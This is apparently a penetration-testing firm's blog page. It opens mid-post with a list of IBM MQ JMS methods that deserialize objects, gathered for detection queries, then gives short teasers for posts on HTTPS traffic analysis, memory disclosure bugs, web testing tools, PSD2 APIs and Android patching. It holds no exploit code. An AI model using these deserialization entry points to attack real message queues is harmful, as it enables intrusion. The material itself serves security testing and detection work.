  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObject – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObjectInternal – Already identified
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.isBodyAssignableTo – Private method (used for type checks, see above)
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.messageToJmsMessageImpl – Protected method
  • com.ibm.msg.client.jms.internal.JmsStreamMessageImpl.<init> – Deserializes javax.jms.StreamMessage objects.

The above logic can be reused for other implementations too, so accurate detections can be developed for reliant applications. Connecting paths between applications and transport implementations doesn’t seem possible with static analysis, as the JMS API loads the implementations dynamically. Our static queries are soon to be released on GitHub.

A Word About Enterprise Architecture and Threat Models

When dealing with targets similar to the one described in this article, it is usually difficult to create a practical test scenario that is technically achievable, and makes sense from a threat modeling perspective.

In our experience, this problem stems from the fact, that architectures like ESB and the tools built around them provide abstractions that hide the actual implementation details from the end users and even administrators. And when people think about things like “message-oriented middleware” instead of long-lived TCP connections between machines, it can be hard to figure out that at the end of day, one can simply send potentially malicious input to 10.0.0.1 by establishing a TCP connection to port 1414 on 10.1.2.3. This means that in many cases it’s surprisingly hard to find someone who can specify in technical terms where and how an application should be tested, not to to mention the approval of these tests. Another result of this, is that in many cases message queues are treated as inherently trusted – no one can attack a magic box, that no one (at least none of us) knows how it exactly works, right?

Technical security assessments can be great opportunities to not only discover vulnerabilities early, but also to get more familiar with the actual workings of these complex, but not incomprehensible systems. It the end, we are the ones whose job is to understand systems from top to bottom.

Special thanks to Matthias Kaiser and Fabian Yamaguchi for their tools and help in compiling this blog post! Featured image from Birds of Prey.


Tips and scripts for reconnaissance and scanning

Author: pz

Renewal paper of my GIAC Web Application Penetration Tester certification:

Tips and scripts for reconnaissance and scanning


Decrypting and analyzing HTTPS traffic without MITM

Author: dnet

Sniffing plaintext network traffic between apps and their backend APIs is an important step for pentesters to learn about how they interact. In this blog post, we’ll introduce a method to simplify getting our hands on plaintext messages sent between apps ran on our attacker-controlled devices and the API, and in case of HTTPS, shoveling these requests and responses into Burp for further analysis by combining existing tools and introducing a new plugin we developed. So our approach is less of a novel attack and more of an improvement on current techniques.

Of course, nowadays, most of these channels are secured using TLS, which provides encryption, integrity protection and authenticates one or both ends of the figurative tube. In many cases, the best method to overcome this limitation is man-in-the-middle (MITM), where a special program intercepts packets and acts as a server to the client and vice versa.

For well-written applications, this doesn’t work out-of-the-box, and it all depends on the circumstances, how many steps must be taken to weaken the security of the testing environment for this attack to work. It started with adding MITM CA certificates to OS stores, recent operating systems require more and more obscure confirmations and certificate pinning is gaining momentum. Latter can get to a point, where there’s a big cliff: either you can defeat it with automated tools like Objection or it becomes a daunting task, where you know that it’s doable but it’s frustratingly difficult to actually do it.

(more…)


Uninitialized Memory Disclosures in Web Applications

Author: b

While we at Silent Signal are strong believers in human creativity when it comes to finding new, or unusual vulnerabilities, we’re also constantly looking for ways to transform our experience into automated tools that can reliably and efficiently detect already known bug classes. The discovery of CVE-2019-6976 – an uninitialized memory disclosure bug in a widely used imaging library – was a particularly interesting finding to me, as it represented a lesser known class of issues in the intersection of web application and memory safety bugs, so it seemed to be a nice topic for my next GWAPT Gold Paper.

(more…)


Unix-style approach to web application testing

Author: dnet

SANS Institute accepted my GWAPT Gold Paper about Unix-style approach to web application testing, the paper is now published in the Reading Room.

The paper introduces several problems I’ve been facing while testing web applications, which converged in a common direction. Burp Suite is known by most and used by many professionals in this field, and while it’s extensible, writing such bits of software have a higher barrier of entry than the budgets of some project would allow for a one-off throwaway tool. Our solution, Piper is introduced through real-world examples to demonstrate its usage and the fact that it’s worth using it. I tried showing alternatives to each subset of the functionality to stimulate critical thinking in the minds of fellow penetration testers, since this tool is not a silver bullet either. By describing the landscape in a thorough manner, I hope everyone can learn to pick the best tool for the job, which might or might not be Piper.

The full Gold Paper can be downloaded from the website of SANS Institute:

Unix-style approach to web application testing

The accompanying code is available on GitHub. For those who prefer video content, only have 2 minutes, or find the whole idea too abstract, we made a short demonstration of the basic features below. If you’re interested in deeper internals, there’s also a longer, 45-minutes talk about it.


Wide open banking: PSD2 and us

Author: dnet

With the advent of PSD2 APIs, we had the opportunity to test some of them upon request from our clients. Although internet-facing APIs were already a thing thanks to smartphone apps, it seems that regulatory requirements and 3-way setups (customer, bank, provider) led to some surprises. Here are some of the things we found.

(more…)


Patching Android apps: what could possibly go wrong

Author: dnet

Many tools are timeless: a quality screwdriver will work in ten years just as fine as yesterday. Reverse engineering tools, on the other hand need constant maintenance as the technology we try to inspect with them is a moving target. We’ll show you how just a simple exercise in Android reverse engineering resulted in three patches in an already up-to-date tool.

(more…)